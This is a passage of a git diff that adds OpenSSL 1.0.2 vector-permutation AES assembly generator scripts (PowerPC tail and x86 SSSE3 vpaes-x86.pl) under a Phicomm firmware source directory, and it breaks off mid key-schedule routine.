+	addi	r11,r11,32
+	stvx	v28,r10,$sp
+	addi	r10,r10,32
+	stvx	v29,r11,$sp
+	addi	r11,r11,32
+	stvx	v30,r10,$sp
+	stvx	v31,r11,$sp
+	stw	r6,`$FRAME-4`($sp)	# save vrsave
+	li	r7, -1
+	$PUSH	r0, `$FRAME+$LRSAVE`($sp)
+	mtspr	256, r7			# preserve all AltiVec registers
+
+	srwi	r9, $bits, 5		# shr	\$5,%eax
+	addi	r9, r9, 6		# add	\$5,%eax
+	stw	r9, 240($out)		# mov	%eax,240(%rdx)	# AES_KEY->rounds = nbits/32+5;
+
+	slwi	r9, r9, 4		# shl	\$4,%eax
+	add	$out, $out, r9		# lea	(%rdx,%rax),%rdx
+
+	cmplwi	$dir, $bits, 0		# set decrypt direction
+	srwi	r8, $bits, 1		# shr	\$1,%r8d
+	andi.	r8, r8, 32		# and	\$32,%r8d
+	xori	r8, r8, 32		# xor	\$32,%r8d	# nbits==192?0:32
+	bl	_vpaes_schedule_core
+
+	$POP	r0,  `$FRAME+$LRSAVE`($sp)
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mtspr	256, r6			# restore vrsave
+	mtlr	r0
+	xor	r3, r3, r3
+	lvx	v20,r10,$sp
+	addi	r10,r10,32
+	lvx	v21,r11,$sp
+	addi	r11,r11,32
+	lvx	v22,r10,$sp
+	addi	r10,r10,32
+	lvx	v23,r11,$sp
+	addi	r11,r11,32
+	lvx	v24,r10,$sp
+	addi	r10,r10,32
+	lvx	v25,r11,$sp
+	addi	r11,r11,32
+	lvx	v26,r10,$sp
+	addi	r10,r10,32
+	lvx	v27,r11,$sp
+	addi	r11,r11,32
+	lvx	v28,r10,$sp
+	addi	r10,r10,32
+	lvx	v29,r11,$sp
+	addi	r11,r11,32
+	lvx	v30,r10,$sp
+	lvx	v31,r11,$sp
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,0x04,1,0x80,0,3,0
+	.long	0
+.size	.vpaes_set_decrypt_key,.-.vpaes_set_decrypt_key
+___
+}
+
+my $consts=1;
+foreach  (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/geo;
+
+	# constants table endian-specific conversion
+	if ($consts && m/\.long\s+(.+)\s+(\?[a-z]*)$/o) {
+	    my $conv=$2;
+	    my @bytes=();
+
+	    # convert to endian-agnostic format
+	    foreach (split(/,\s+/,$1)) {
+		my $l = /^0/?oct:int;
+		push @bytes,($l>>24)&0xff,($l>>16)&0xff,($l>>8)&0xff,$l&0xff;
+	    }
+
+	    # little-endian conversion
+	    if ($flavour =~ /le$/o) {
+		SWITCH: for($conv)  {
+		    /\?inv/ && do   { @bytes=map($_^0xf,@bytes); last; };
+		    /\?rev/ && do   { @bytes=reverse(@bytes);    last; }; 
+		}
+	    }
+
+	    #emit
+	    print ".byte\t",join(',',map (sprintf("0x%02x",$_),@bytes)),"\n";
+	    next;
+	}
+	$consts=0 if (m/Lconsts:/o);	# end of table
+
+	# instructions prefixed with '?' are endian-specific and need
+	# to be adjusted accordingly...
+	if ($flavour =~ /le$/o) {	# little-endian
+	    s/\?lvsr/lvsl/o or
+	    s/\?lvsl/lvsr/o or
+	    s/\?(vperm\s+v[0-9]+,\s*)(v[0-9]+,\s*)(v[0-9]+,\s*)(v[0-9]+)/$1$3$2$4/o or
+	    s/\?(vsldoi\s+v[0-9]+,\s*)(v[0-9]+,)\s*(v[0-9]+,\s*)([0-9]+)/$1$3$2 16-$4/o or
+	    s/\?(vspltw\s+v[0-9]+,\s*)(v[0-9]+,)\s*([0-9])/$1$2 3-$3/o;
+	} else {			# big-endian
+	    s/\?([a-z]+)/$1/o;
+	}
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86.pl
new file mode 100644
index 0000000..2ba149c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86.pl
@@ -0,0 +1,903 @@
+#!/usr/bin/env perl
+
+######################################################################
+## Constant-time SSSE3 AES core implementation.
+## version 0.1
+##
+## By Mike Hamburg (Stanford University), 2009
+## Public domain.
+##
+## For details see http://shiftleft.org/papers/vector_aes/ and
+## http://crypto.stanford.edu/vpaes/.
+
+######################################################################
+# September 2011.
+#
+# Port vpaes-x86_64.pl as 32-bit "almost" drop-in replacement for
+# aes-586.pl. "Almost" refers to the fact that AES_cbc_encrypt
+# doesn't handle partial vectors (doesn't have to if called from
+# EVP only). "Drop-in" implies that this module doesn't share key
+# schedule structure with the original nor does it make assumption
+# about its alignment...
+#
+# Performance summary. aes-586.pl column lists large-block CBC
+# encrypt/decrypt/with-hyper-threading-off(*) results in cycles per
+# byte processed with 128-bit key, and vpaes-x86.pl column - [also
+# large-block CBC] encrypt/decrypt.
+#
+#		aes-586.pl		vpaes-x86.pl
+#
+# Core 2(**)	28.1/41.4/18.3		21.9/25.2(***)
+# Nehalem	27.9/40.4/18.1		10.2/11.9
+# Atom		70.7/92.1/60.1		61.1/75.4(***)
+# Silvermont	45.4/62.9/24.1		49.2/61.1(***)
+#
+# (*)	"Hyper-threading" in the context refers rather to cache shared
+#	among multiple cores, than to specifically Intel HTT. As vast
+#	majority of contemporary cores share cache, slower code path
+#	is common place. In other words "with-hyper-threading-off"
+#	results are presented mostly for reference purposes.
+#
+# (**)	"Core 2" refers to initial 65nm design, a.k.a. Conroe.
+#
+# (***)	Less impressive improvement on Core 2 and Atom is due to slow
+#	pshufb,	yet it's respectable +28%/64%  improvement on Core 2
+#	and +15% on Atom (as implied, over "hyper-threading-safe"
+#	code path).
+#
+#						<appro@openssl.org>
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"vpaes-x86.pl",$x86only = $ARGV[$#ARGV] eq "386");
+
+$PREFIX="vpaes";
+
+my  ($round, $base, $magic, $key, $const, $inp, $out)=
+    ("eax",  "ebx", "ecx",  "edx","ebp",  "esi","edi");
+
+&static_label("_vpaes_consts");
+&static_label("_vpaes_schedule_low_round");
+
+&set_label("_vpaes_consts",64);
+$k_inv=-0x30;		# inv, inva
+	&data_word(0x0D080180,0x0E05060F,0x0A0B0C02,0x04070309);
+	&data_word(0x0F0B0780,0x01040A06,0x02050809,0x030D0E0C);
+
+$k_s0F=-0x10;		# s0F
+	&data_word(0x0F0F0F0F,0x0F0F0F0F,0x0F0F0F0F,0x0F0F0F0F);
+
+$k_ipt=0x00;		# input transform (lo, hi)
+	&data_word(0x5A2A7000,0xC2B2E898,0x52227808,0xCABAE090);
+	&data_word(0x317C4D00,0x4C01307D,0xB0FDCC81,0xCD80B1FC);
+
+$k_sb1=0x20;		# sb1u, sb1t
+	&data_word(0xCB503E00,0xB19BE18F,0x142AF544,0xA5DF7A6E);
+	&data_word(0xFAE22300,0x3618D415,0x0D2ED9EF,0x3BF7CCC1);
+$k_sb2=0x40;		# sb2u, sb2t
+	&data_word(0x0B712400,0xE27A93C6,0xBC982FCD,0x5EB7E955);
+	&data_word(0x0AE12900,0x69EB8840,0xAB82234A,0xC2A163C8);
+$k_sbo=0x60;		# sbou, sbot
+	&data_word(0x6FBDC700,0xD0D26D17,0xC502A878,0x15AABF7A);
+	&data_word(0x5FBB6A00,0xCFE474A5,0x412B35FA,0x8E1E90D1);
+
+$k_mc_forward=0x80;	# mc_forward
+	&data_word(0x00030201,0x04070605,0x080B0A09,0x0C0F0E0D);
+	&data_word(0x04070605,0x080B0A09,0x0C0F0E0D,0x00030201);
+	&data_word(0x080B0A09,0x0C0F0E0D,0x00030201,0x04070605);
+	&data_word(0x0C0F0E0D,0x00030201,0x04070605,0x080B0A09);
+
+$k_mc_backward=0xc0;	# mc_backward
+	&data_word(0x02010003,0x06050407,0x0A09080B,0x0E0D0C0F);
+	&data_word(0x0E0D0C0F,0x02010003,0x06050407,0x0A09080B);
+	&data_word(0x0A09080B,0x0E0D0C0F,0x02010003,0x06050407);
+	&data_word(0x06050407,0x0A09080B,0x0E0D0C0F,0x02010003);
+
+$k_sr=0x100;		# sr
+	&data_word(0x03020100,0x07060504,0x0B0A0908,0x0F0E0D0C);
+	&data_word(0x0F0A0500,0x030E0904,0x07020D08,0x0B06010C);
+	&data_word(0x0B020900,0x0F060D04,0x030A0108,0x070E050C);
+	&data_word(0x070A0D00,0x0B0E0104,0x0F020508,0x0306090C);
+
+$k_rcon=0x140;		# rcon
+	&data_word(0xAF9DEEB6,0x1F8391B9,0x4D7C7D81,0x702A9808);
+
+$k_s63=0x150;		# s63: all equal to 0x63 transformed
+	&data_word(0x5B5B5B5B,0x5B5B5B5B,0x5B5B5B5B,0x5B5B5B5B);
+
+$k_opt=0x160;		# output transform
+	&data_word(0xD6B66000,0xFF9F4929,0xDEBE6808,0xF7974121);
+	&data_word(0x50BCEC00,0x01EDBD51,0xB05C0CE0,0xE10D5DB1);
+
+$k_deskew=0x180;	# deskew tables: inverts the sbox's "skew"
+	&data_word(0x47A4E300,0x07E4A340,0x5DBEF91A,0x1DFEB95A);
+	&data_word(0x83EA6900,0x5F36B5DC,0xF49D1E77,0x2841C2AB);
+##
+##  Decryption stuff
+##  Key schedule constants
+##
+$k_dksd=0x1a0;		# decryption key schedule: invskew x*D
+	&data_word(0xA3E44700,0xFEB91A5D,0x5A1DBEF9,0x0740E3A4);
+	&data_word(0xB5368300,0x41C277F4,0xAB289D1E,0x5FDC69EA);
+$k_dksb=0x1c0;		# decryption key schedule: invskew x*B
+	&data_word(0x8550D500,0x9A4FCA1F,0x1CC94C99,0x03D65386);
+	&data_word(0xB6FC4A00,0x115BEDA7,0x7E3482C8,0xD993256F);
+$k_dkse=0x1e0;		# decryption key schedule: invskew x*E + 0x63
+	&data_word(0x1FC9D600,0xD5031CCA,0x994F5086,0x53859A4C);
+	&data_word(0x4FDC7BE8,0xA2319605,0x20B31487,0xCD5EF96A);
+$k_dks9=0x200;		# decryption key schedule: invskew x*9
+	&data_word(0x7ED9A700,0xB6116FC8,0x82255BFC,0x4AED9334);
+	&data_word(0x27143300,0x45765162,0xE9DAFDCE,0x8BB89FAC);
+
+##
+##  Decryption stuff
+##  Round function constants
+##
+$k_dipt=0x220;		# decryption input transform
+	&data_word(0x0B545F00,0x0F505B04,0x114E451A,0x154A411E);
+	&data_word(0x60056500,0x86E383E6,0xF491F194,0x12771772);
+
+$k_dsb9=0x240;		# decryption sbox output *9*u, *9*t
+	&data_word(0x9A86D600,0x851C0353,0x4F994CC9,0xCAD51F50);
+	&data_word(0xECD74900,0xC03B1789,0xB2FBA565,0x725E2C9E);
+$k_dsbd=0x260;		# decryption sbox output *D*u, *D*t
+	&data_word(0xE6B1A200,0x7D57CCDF,0x882A4439,0xF56E9B13);
+	&data_word(0x24C6CB00,0x3CE2FAF7,0x15DEEFD3,0x2931180D);
+$k_dsbb=0x280;		# decryption sbox output *B*u, *B*t
+	&data_word(0x96B44200,0xD0226492,0xB0F2D404,0x602646F6);
+	&data_word(0xCD596700,0xC19498A6,0x3255AA6B,0xF3FF0C3E);
+$k_dsbe=0x2a0;		# decryption sbox output *E*u, *E*t
+	&data_word(0x26D4D000,0x46F29296,0x64B4F6B0,0x22426004);
+	&data_word(0xFFAAC100,0x0C55A6CD,0x98593E32,0x9467F36B);
+$k_dsbo=0x2c0;		# decryption sbox final output
+	&data_word(0x7EF94000,0x1387EA53,0xD4943E2D,0xC7AA6DB9);
+	&data_word(0x93441D00,0x12D7560F,0xD8C58E9C,0xCA4B8159);
+&asciz	("Vector Permutation AES for x86/SSSE3, Mike Hamburg (Stanford University)");
+&align	(64);
+
+&function_begin_B("_vpaes_preheat");
+	&add	($const,&DWP(0,"esp"));
+	&movdqa	("xmm7",&QWP($k_inv,$const));
+	&movdqa	("xmm6",&QWP($k_s0F,$const));
+	&ret	();
+&function_end_B("_vpaes_preheat");
+
+##
+##  _aes_encrypt_core
+##
+##  AES-encrypt %xmm0.
+##
+##  Inputs:
+##     %xmm0 = input
+##     %xmm6-%xmm7 as in _vpaes_preheat
+##    (%edx) = scheduled keys
+##
+##  Output in %xmm0
+##  Clobbers  %xmm1-%xmm5, %eax, %ebx, %ecx, %edx
+##
+##
+&function_begin_B("_vpaes_encrypt_core");
+	&mov	($magic,16);
+	&mov	($round,&DWP(240,$key));
+	&movdqa	("xmm1","xmm6")
+	&movdqa	("xmm2",&QWP($k_ipt,$const));
+	&pandn	("xmm1","xmm0");
+	&pand	("xmm0","xmm6");
+	&movdqu	("xmm5",&QWP(0,$key));
+	&pshufb	("xmm2","xmm0");
+	&movdqa	("xmm0",&QWP($k_ipt+16,$const));
+	&pxor	("xmm2","xmm5");
+	&psrld	("xmm1",4);
+	&add	($key,16);
+	&pshufb	("xmm0","xmm1");
+	&lea	($base,&DWP($k_mc_backward,$const));
+	&pxor	("xmm0","xmm2");
+	&jmp	(&label("enc_entry"));
+
+
+&set_label("enc_loop",16);
+	# middle of middle round
+	&movdqa	("xmm4",&QWP($k_sb1,$const));	# 4 : sb1u
+	&movdqa	("xmm0",&QWP($k_sb1+16,$const));# 0 : sb1t
+	&pshufb	("xmm4","xmm2");		# 4 = sb1u
+	&pshufb	("xmm0","xmm3");		# 0 = sb1t
+	&pxor	("xmm4","xmm5");		# 4 = sb1u + k
+	&movdqa	("xmm5",&QWP($k_sb2,$const));	# 4 : sb2u
+	&pxor	("xmm0","xmm4");		# 0 = A
+	&movdqa	("xmm1",&QWP(-0x40,$base,$magic));# .Lk_mc_forward[]
+	&pshufb	("xmm5","xmm2");		# 4 = sb2u
+	&movdqa	("xmm2",&QWP($k_sb2+16,$const));# 2 : sb2t
+	&movdqa	("xmm4",&QWP(0,$base,$magic));	# .Lk_mc_backward[]
+	&pshufb	("xmm2","xmm3");		# 2 = sb2t
+	&movdqa	("xmm3","xmm0");		# 3 = A
+	&pxor	("xmm2","xmm5");		# 2 = 2A
+	&pshufb	("xmm0","xmm1");		# 0 = B
+	&add	($key,16);			# next key
+	&pxor	("xmm0","xmm2");		# 0 = 2A+B
+	&pshufb	("xmm3","xmm4");		# 3 = D
+	&add	($magic,16);			# next mc
+	&pxor	("xmm3","xmm0");		# 3 = 2A+B+D
+	&pshufb	("xmm0","xmm1");		# 0 = 2B+C
+	&and	($magic,0x30);			# ... mod 4
+	&sub	($round,1);			# nr--
+	&pxor	("xmm0","xmm3");		# 0 = 2A+3B+C+D
+
+&set_label("enc_entry");
+	# top of round
+	&movdqa	("xmm1","xmm6");		# 1 : i
+	&movdqa	("xmm5",&QWP($k_inv+16,$const));# 2 : a/k
+	&pandn	("xmm1","xmm0");		# 1 = i<<4
+	&psrld	("xmm1",4);			# 1 = i
+	&pand	("xmm0","xmm6");		# 0 = k
+	&pshufb	("xmm5","xmm0");		# 2 = a/k
+	&movdqa	("xmm3","xmm7");		# 3 : 1/i
+	&pxor	("xmm0","xmm1");		# 0 = j
+	&pshufb	("xmm3","xmm1");		# 3 = 1/i
+	&movdqa	("xmm4","xmm7");		# 4 : 1/j
+	&pxor	("xmm3","xmm5");		# 3 = iak = 1/i + a/k
+	&pshufb	("xmm4","xmm0");		# 4 = 1/j
+	&movdqa	("xmm2","xmm7");		# 2 : 1/iak
+	&pxor	("xmm4","xmm5");		# 4 = jak = 1/j + a/k
+	&pshufb	("xmm2","xmm3");		# 2 = 1/iak
+	&movdqa	("xmm3","xmm7");		# 3 : 1/jak
+	&pxor	("xmm2","xmm0");		# 2 = io
+	&pshufb	("xmm3","xmm4");		# 3 = 1/jak
+	&movdqu	("xmm5",&QWP(0,$key));
+	&pxor	("xmm3","xmm1");		# 3 = jo
+	&jnz	(&label("enc_loop"));
+
+	# middle of last round
+	&movdqa	("xmm4",&QWP($k_sbo,$const));	# 3 : sbou      .Lk_sbo
+	&movdqa	("xmm0",&QWP($k_sbo+16,$const));# 3 : sbot      .Lk_sbo+16
+	&pshufb	("xmm4","xmm2");		# 4 = sbou
+	&pxor	("xmm4","xmm5");		# 4 = sb1u + k
+	&pshufb	("xmm0","xmm3");		# 0 = sb1t
+	&movdqa	("xmm1",&QWP(0x40,$base,$magic));# .Lk_sr[]
+	&pxor	("xmm0","xmm4");		# 0 = A
+	&pshufb	("xmm0","xmm1");
+	&ret	();
+&function_end_B("_vpaes_encrypt_core");
+
+##
+##  Decryption core
+##
+##  Same API as encryption core.
+##
+&function_begin_B("_vpaes_decrypt_core");
+	&lea	($base,&DWP($k_dsbd,$const));
+	&mov	($round,&DWP(240,$key));
+	&movdqa	("xmm1","xmm6");
+	&movdqa	("xmm2",&QWP($k_dipt-$k_dsbd,$base));
+	&pandn	("xmm1","xmm0");
+	&mov	($magic,$round);
+	&psrld	("xmm1",4)
+	&movdqu	("xmm5",&QWP(0,$key));
+	&shl	($magic,4);
+	&pand	("xmm0","xmm6");
+	&pshufb	("xmm2","xmm0");
+	&movdqa	("xmm0",&QWP($k_dipt-$k_dsbd+16,$base));
+	&xor	($magic,0x30);
+	&pshufb	("xmm0","xmm1");
+	&and	($magic,0x30);
+	&pxor	("xmm2","xmm5");
+	&movdqa	("xmm5",&QWP($k_mc_forward+48,$const));
+	&pxor	("xmm0","xmm2");
+	&add	($key,16);
+	&lea	($magic,&DWP($k_sr-$k_dsbd,$base,$magic));
+	&jmp	(&label("dec_entry"));
+
+&set_label("dec_loop",16);
+##
+##  Inverse mix columns
+##
+	&movdqa	("xmm4",&QWP(-0x20,$base));	# 4 : sb9u
+	&movdqa	("xmm1",&QWP(-0x10,$base));	# 0 : sb9t
+	&pshufb	("xmm4","xmm2");		# 4 = sb9u
+	&pshufb	("xmm1","xmm3");		# 0 = sb9t
+	&pxor	("xmm0","xmm4");
+	&movdqa	("xmm4",&QWP(0,$base));		# 4 : sbdu
+	&pxor	("xmm0","xmm1");		# 0 = ch
+	&movdqa	("xmm1",&QWP(0x10,$base));	# 0 : sbdt
+
+	&pshufb	("xmm4","xmm2");		# 4 = sbdu
+	&pshufb	("xmm0","xmm5");		# MC ch
+	&pshufb	("xmm1","xmm3");		# 0 = sbdt
+	&pxor	("xmm0","xmm4");		# 4 = ch
+	&movdqa	("xmm4",&QWP(0x20,$base));	# 4 : sbbu
+	&pxor	("xmm0","xmm1");		# 0 = ch
+	&movdqa	("xmm1",&QWP(0x30,$base));	# 0 : sbbt
+
+	&pshufb	("xmm4","xmm2");		# 4 = sbbu
+	&pshufb	("xmm0","xmm5");		# MC ch
+	&pshufb	("xmm1","xmm3");		# 0 = sbbt
+	&pxor	("xmm0","xmm4");		# 4 = ch
+	&movdqa	("xmm4",&QWP(0x40,$base));	# 4 : sbeu
+	&pxor	("xmm0","xmm1");		# 0 = ch
+	&movdqa	("xmm1",&QWP(0x50,$base));	# 0 : sbet
+
+	&pshufb	("xmm4","xmm2");		# 4 = sbeu
+	&pshufb	("xmm0","xmm5");		# MC ch
+	&pshufb	("xmm1","xmm3");		# 0 = sbet
+	&pxor	("xmm0","xmm4");		# 4 = ch
+	&add	($key,16);			# next round key
+	&palignr("xmm5","xmm5",12);
+	&pxor	("xmm0","xmm1");		# 0 = ch
+	&sub	($round,1);			# nr--
+
+&set_label("dec_entry");
+	# top of round
+	&movdqa	("xmm1","xmm6");		# 1 : i
+	&movdqa	("xmm2",&QWP($k_inv+16,$const));# 2 : a/k
+	&pandn	("xmm1","xmm0");		# 1 = i<<4
+	&pand	("xmm0","xmm6");		# 0 = k
+	&psrld	("xmm1",4);			# 1 = i
+	&pshufb	("xmm2","xmm0");		# 2 = a/k
+	&movdqa	("xmm3","xmm7");		# 3 : 1/i
+	&pxor	("xmm0","xmm1");		# 0 = j
+	&pshufb	("xmm3","xmm1");		# 3 = 1/i
+	&movdqa	("xmm4","xmm7");		# 4 : 1/j
+	&pxor	("xmm3","xmm2");		# 3 = iak = 1/i + a/k
+	&pshufb	("xmm4","xmm0");		# 4 = 1/j
+	&pxor	("xmm4","xmm2");		# 4 = jak = 1/j + a/k
+	&movdqa	("xmm2","xmm7");		# 2 : 1/iak
+	&pshufb	("xmm2","xmm3");		# 2 = 1/iak
+	&movdqa	("xmm3","xmm7");		# 3 : 1/jak
+	&pxor	("xmm2","xmm0");		# 2 = io
+	&pshufb	("xmm3","xmm4");		# 3 = 1/jak
+	&movdqu	("xmm0",&QWP(0,$key));
+	&pxor	("xmm3","xmm1");		# 3 = jo
+	&jnz	(&label("dec_loop"));
+
+	# middle of last round
+	&movdqa	("xmm4",&QWP(0x60,$base));	# 3 : sbou
+	&pshufb	("xmm4","xmm2");		# 4 = sbou
+	&pxor	("xmm4","xmm0");		# 4 = sb1u + k
+	&movdqa	("xmm0",&QWP(0x70,$base));	# 0 : sbot
+	&movdqa	("xmm2",&QWP(0,$magic));
+	&pshufb	("xmm0","xmm3");		# 0 = sb1t
+	&pxor	("xmm0","xmm4");		# 0 = A
+	&pshufb	("xmm0","xmm2");
+	&ret	();
+&function_end_B("_vpaes_decrypt_core");
+
+########################################################
+##                                                    ##
+##                  AES key schedule                  ##
+##                                                    ##
+########################################################
+&function_begin_B("_vpaes_schedule_core");
+	&add	($const,&DWP(0,"esp"));
+	&movdqu	("xmm0",&QWP(0,$inp));		# load key (unaligned)
+	&movdqa	("xmm2",&QWP($k_rcon,$const));	# load rcon
+
+	# input transform
+	&movdqa	("xmm3","xmm0");
+	&lea	($base,&DWP($k_ipt,$const));
+	&movdqa	(&QWP(4,"esp"),"xmm2");		# xmm8
+	&call	("_vpaes_schedule_transform");
+	&movdqa	("xmm7","xmm0");
+
+	&test	($out,$out);
+	&jnz	(&label("schedule_am_decrypting"));
+
+	# encrypting, output zeroth round key after transform
+	&movdqu	(&QWP(0,$key),"xmm0");
+	&jmp	(&label("schedule_go"));
+
+&set_label("schedule_am_decrypting");
+	# decrypting, output zeroth round key after shiftrows
+	&movdqa	("xmm1",&QWP($k_sr,$const,$magic));
+	&pshufb	("xmm3","xmm1");
+	&movdqu	(&QWP(0,$key),"xmm3");
+	&xor	($magic,0x30);
+
+&set_label("schedule_go");
+	&cmp	($round,192);
+	&ja	(&label("schedule_256"));
+	&je	(&label("schedule_192"));
+	# 128: fall though
+
+##
+##  .schedule_128
+##
+##  128-bit specific part of key schedule.
+##
+##  This schedule is really simple, because all its parts
+##  are accomplished by the subroutines.
+##
+&set_label("schedule_128");
+	&mov	($round,10);
+
+&set_label("loop_schedule_128");
+	&call	("_vpaes_schedule_round");
+	&dec	($round);
+	&jz	(&label("schedule_mangle_last"));
+	&call	("_vpaes_schedule_mangle");	# write output
+	&jmp	(&label("loop_schedule_128"));
+
+##
+##  .aes_schedule_192
+##
+##  192-bit specific part of key schedule.
+##
+##  The main body of this schedule is the same as the 128-bit
+##  schedule, but with more smearing.  The long, high side is
+##  stored in %xmm7 as before, and the short, low side is in
+##  the high bits of %xmm6.
+##
+##  This schedule is somewhat nastier, however, because each
+##  round produces 192 bits of key material, or 1.5 round keys.
+##  Therefore, on each cycle we do 2 rounds and produce 3 round
+##  keys.
+##
+&set_label("schedule_192",16);
+	&movdqu	("xmm0",&QWP(8,$inp));		# load key part 2 (very unaligned)
+	&call	("_vpaes_schedule_transform");	# input transform	
+	&movdqa	("xmm6","xmm0");		# save short part
+	&pxor	("xmm4","xmm4");		# clear 4
+	&movhlps("xmm6","xmm4");		# clobber low side with zeros
+	&mov	($round,4);
+
+&set_label("loop_schedule_192");
+	&call	("_vpaes_schedule_round");
+	&palignr("xmm0","xmm6",8);
+	&call	("_vpaes_schedule_mangle");	# save key n
+	&call	("_vpaes_schedule_192_smear");
+	&call	("_vpaes_schedule_mangle");	# save key n+1
+	&call	("_vpaes_schedule_round");
+	&dec	($round);
+	&jz	(&label("schedule_mangle_last"));
+	&call	("_vpaes_schedule_mangle");	# save key n+2
+	&call	("_vpaes_schedule_192_smear");
+	&jmp	(&label("loop_schedule_192"));
+
+##
+##  .aes_schedule_256
+##
+##  256-bit specific part of key schedule.
+##
+##  The structure here is very similar to the 128-bit
+##  schedule, but with an additional "low side" in
+##  %xmm6.  The low side's rounds are the same as the
+##  high side's, except no rcon and no rotation.
+##
+&set_label("schedule_256",16);
+	&movdqu	("xmm0",&QWP(16,$inp));		# load key part 2 (unaligned)
+	&call	("_vpaes_schedule_transform");	# input transform	
+	&mov	($round,7);
+
+&set_label("loop_schedule_256");
+	&call	("_vpaes_schedule_mangle");	# output low result
+	&movdqa	("xmm6","xmm0");		# save cur_lo in xmm6
+
+	# high round
+	&call	("_vpaes_schedule_round");
+	&dec	($round);
+	&jz	(&label("schedule_mangle_last"));
+	&call	("_vpaes_schedule_mangle");	
+
+	# low round. swap xmm7 and xmm6
+	&pshufd	("xmm0","xmm0",0xFF);
+	&movdqa	(&QWP(20,"esp"),"xmm7");
+	&movdqa	("xmm7","xmm6");
+	&call	("_vpaes_schedule_low_round");
+	&movdqa	("xmm7",&QWP(20,"esp"));
+
+	&jmp	(&label("loop_schedule_256"));
+
+##
+##  .aes_schedule_mangle_last
+##
+##  Mangler for last round of key schedule
+##  Mangles %xmm0
+##    when encrypting, outputs out(%xmm0) ^ 63
+##    when decrypting, outputs unskew(%xmm0)
+##
+##  Always called right before return... jumps to cleanup and exits
+##
+&set_label("schedule_mangle_last",16);
+	# schedule last round key from xmm0
+	&lea	($base,&DWP($k_deskew,$const));
+	&test	($out,$out);
+	&jnz	(&label("schedule_mangle_last_dec"));
+
+	# encrypting
+	&movdqa	("xmm1",&QWP($k_sr,$const,$magic));
+	&pshufb	("xmm0","xmm1");		# output permute
+	&lea	($base,&DWP($k_opt,$const));	# prepare to output transform
+	&add	($key,32);
+
+&set_label("schedule_mangle_last_dec");
+	&add	($key,-16);
+	&pxor	("xmm0",&QWP($k_s63,$const));
+	&call	("_vpaes_schedule_transform");	# output transform
+	&movdqu	(&QWP(0,$key),"xmm0");		# save last key
+
+	# cleanup
+	&pxor	("xmm0","xmm0");
+	&pxor	("xmm1","xmm1");
+	&pxor	("xmm2","xmm2");
+	&pxor	("xmm3","xmm3");
+	&pxor	("xmm4","xmm4");
+	&pxor	("xmm5","xmm5");
+	&pxor	("xmm6","xmm6");
+	&pxor	("xmm7","xmm7");
+	&ret	();
+&function_end_B("_vpaes_schedule_core");
+
+##
+##  .aes_schedule_192_smear
+##
+##  Smear the short, low side in the 192-bit key schedule.
+##
+##  Inputs:
+##    %xmm7: high side, b  a  x  y
+##    %xmm6:  low side, d  c  0  0
+##    %xmm13: 0
+##
+##  Outputs:
+##    %xmm6: b+c+d  b+c  0  0
+##    %xmm0: b+c+d  b+c  b  a
+##
+&function_begin_B("_vpaes_schedule_192_smear");
+	&pshufd	("xmm1","xmm6",0x80);		# d c 0 0 -> c 0 0 0
+	&pshufd	("xmm0","xmm7",0xFE);		# b a _ _ -> b b b a
+	&pxor	("xmm6","xmm1");		# -> c+d c 0 0
+	&pxor	("xmm1","xmm1");
+	&pxor	("xmm6","xmm0");		# -> b+c+d b+c b a
+	&movdqa	("xmm0","xmm6");
+	&movhlps("xmm6","xmm1");		# clobber low side with zeros
+	&ret	();
+&function_end_B("_vpaes_schedule_192_smear");
+
+##
+##  .aes_schedule_round
+##
+##  Runs one main round of the key schedule on %xmm0, %xmm7
+##
+##  Specifically, runs subbytes on the high dword of %xmm0
+##  then rotates it by one byte and xors into the low dword of
+##  %xmm7.
+##
+##  Adds rcon from low byte of %xmm8, then rotates %xmm8 for
+##  next rcon.
+##
+##  Smears the dwords of %xmm7 by xoring the low into the
+##  second low, result into third, result into highest.
+##
+##  Returns results in %xmm7 = %xmm0.
+##  Clobbers %xmm1-%xmm5.
+##
+&function_begin_B("_vpaes_schedule_round");
+	# extract rcon from xmm8
+	&movdqa	("xmm2",&QWP(8,"esp"));		# xmm8
+	&pxor	("xmm1","xmm1");
+	&palignr("xmm1","xmm2",15);
+	&palignr("xmm2","xmm2",15);
+	&pxor	("xmm7","xmm1");
+
+	# rotate
+	&pshufd	("xmm0","xmm0",0xFF);
+	&palignr("xmm0","xmm0",1);
+
+	# fall through...
+	&movdqa	(&QWP(8,"esp"),"xmm2");		# xmm8
+
+	# low round: same as high round, but no rotation and no rcon.
+&set_label("_vpaes_schedule_low_round");
+	# smear xmm7
+	&movdqa	("xmm1","xmm7");
+	&pslldq	("xmm7",4);
+	&pxor	("xmm7","xmm1");
+	&movdqa	("xmm1","xmm7");
+	&pslldq	("xmm7",8);
+	&pxor	("xmm7","xmm1");
+	&pxor	("xmm7",&QWP($k_s63,$const));
+
+	# subbyte
+	&movdqa	("xmm4",&QWP($k_s0F,$const));
+	&movdqa	("xmm5",&QWP($k_inv,$const));	# 4 : 1/j
+	&movdqa	("xmm1","xmm4");	
+	&pandn	("xmm1","xmm0");
+	&psrld	("xmm1",4);			# 1 = i
+	&pand	("xmm0","xmm4");		# 0 = k
+	&movdqa	("xmm2",&QWP($k_inv+16,$const));# 2 : a/k
+	&pshufb	("xmm2","xmm0");		# 2 = a/k
+	&pxor	("xmm0","xmm1");		# 0 = j
+	&movdqa	("xmm3","xmm5");		# 3 : 1/i
+	&pshufb	("xmm3","xmm1");		# 3 = 1/i
+	&pxor	("xmm3","xmm2");		# 3 = iak = 1/i + a/k
+	&movdqa	("xmm4","xmm5");		# 4 : 1/j
+	&pshufb	("xmm4","xmm0");		# 4 = 1/j
+	&pxor	("xmm4","xmm2");		# 4 = jak = 1/j + a/k
+	&movdqa	("xmm2","xmm5");		# 2 : 1/iak
+	&pshufb	("xmm2","xmm3");		# 2 = 1/iak
+	&pxor	("xmm2","xmm0");		# 2 = io
